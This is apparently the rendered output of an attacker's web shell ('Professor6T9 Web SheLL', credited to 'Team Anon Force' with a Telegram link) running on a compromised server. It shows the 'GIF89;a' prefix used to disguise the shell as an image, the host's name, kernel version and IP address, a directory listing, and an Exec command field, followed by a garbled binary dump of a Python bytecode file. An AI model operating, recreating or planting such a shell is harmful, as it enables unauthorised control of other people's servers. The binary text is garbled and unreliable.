GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python312
/
lib64
/
python3.12
/
lib2to3
/
fixes
/
__pycache__
[ HOME ]
Exec
Submit
File Name : fix_future.cpython-312.opt-1.pyc
� ��_i# � �J � d Z ddlmZ ddlmZ G d� dej � Zy)zVRemove __future__ imports from __future__ import foo is replaced with an empty line. � )� fixer_base)� BlankLinec � � e Zd ZdZdZdZd� Zy)� FixFutureTz;import_from< 'from' module_name="__future__" 'import' any >� c �<